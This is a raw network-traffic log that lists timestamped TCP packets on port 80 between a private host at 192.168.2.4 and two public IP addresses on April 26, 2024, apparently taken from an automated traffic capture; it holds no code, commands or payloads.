Apr 26, 2024 23:09:03.074742079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074783087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074799061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074831009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074839115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074872017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.074897051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.074935913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075005054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075043917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075056076 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075092077 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075103998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075146914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075160980 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075201035 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075269938 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075282097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075310946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075324059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075330019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075357914 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075387955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075428009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075462103 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075491905 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075500011 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075527906 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075548887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075577021 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075584888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075612068 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075633049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075675011 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075686932 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075725079 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075747013 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075788021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075829029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075867891 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075880051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075920105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.075941086 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.075977087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.076025963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.076066017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.076138973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.076178074 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.076189995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.076230049 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.076251030 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.076288939 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.076347113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.076385021 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.076442003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.076482058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077219009 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077258110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077382088 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077393055 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077421904 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077436924 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077500105 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077541113 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077572107 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077616930 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077637911 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077678919 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077691078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077729940 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077752113 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077795982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077807903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077846050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077867031 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077908993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077919960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.077960968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.077972889 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078011990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078077078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078119993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078131914 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078181982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078192949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078232050 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078243971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078282118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078301907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078341961 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078356028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078393936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078430891 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078469992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078490973 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078537941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078552008 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078596115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078624010 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078665972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078676939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078716993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078737974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078779936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078792095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078831911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078874111 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078912973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078923941 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.078968048 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.078989029 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079030037 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079045057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079086065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079108953 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079152107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079238892 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079277992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079335928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079371929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079384089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079425097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079437971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079476118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079488993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079508066 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079525948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079543114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079622984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079636097 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079663992 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079675913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079688072 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079710007 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079721928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079761982 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079777002 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079818964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079883099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079907894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.079919100 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079942942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.079972982 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.080013990 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.080070019 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 23:09:03.080121994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 23:09:03.108793974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.108807087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.108865976 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.108903885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.108999014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109010935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109035015 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.109050035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109091043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.109214067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109262943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109304905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.109343052 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109385014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109426975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.109519958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109586000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109630108 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109833002 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.109849930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.109878063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.109925032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110018969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110032082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110053062 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.110099077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110136986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.110207081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110249043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110285044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.110300064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110352039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110379934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110388994 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.110392094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110431910 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.110450029 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110461950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110496044 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.110544920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110558033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110593081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.110726118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110738039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110776901 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.110790014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110801935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110836029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.110846043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110857964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110891104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.110928059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110940933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110958099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.110975981 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.111013889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111052990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.111057997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111129999 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111164093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.111167908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111181021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111216068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.111243963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111469984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111511946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.111776114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111788988 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111830950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.111850977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111864090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111896992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.111917973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111927986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.111963987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.112068892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.112082005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.112102032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.112123966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.112158060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.112169981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.112200022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.112229109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.112268925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.112497091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.112806082 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.112859964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.112895012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114114046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114152908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114170074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114173889 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.114192963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114260912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114273071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114284039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114315987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114336014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114365101 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114428997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114447117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114464998 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.114480019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114500046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.114516973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.114530087 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114628077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114639044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114660978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.114670992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114713907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.114738941 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114752054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114763021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114787102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.114792109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114834070 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.114837885 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114851952 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114872932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114892960 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.114912033 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114934921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.114953041 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.114976883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115016937 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.115021944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115076065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115087986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115117073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.115139961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115151882 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115163088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115178108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.115204096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.115242004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115353107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115365028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115386963 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.115421057 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115433931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115446091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115454912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.115485907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.115541935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115561008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115572929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115595102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.115602970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115638971 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.115664005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115677118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.115709066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.116533041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.116580009 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.116692066 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.116835117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.116868019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.116890907 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.116908073 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.116960049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.116971970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.116992950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.116993904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117008924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117032051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117034912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117072105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117083073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117111921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117141962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117151022 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117186069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117222071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117223978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117274046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117286921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117297888 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117306948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117335081 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117373943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117402077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117424965 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117441893 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117460966 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 23:09:03.117494106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 23:09:03.117507935 CEST	80	49734	176.97.76.106	192.168.2.4
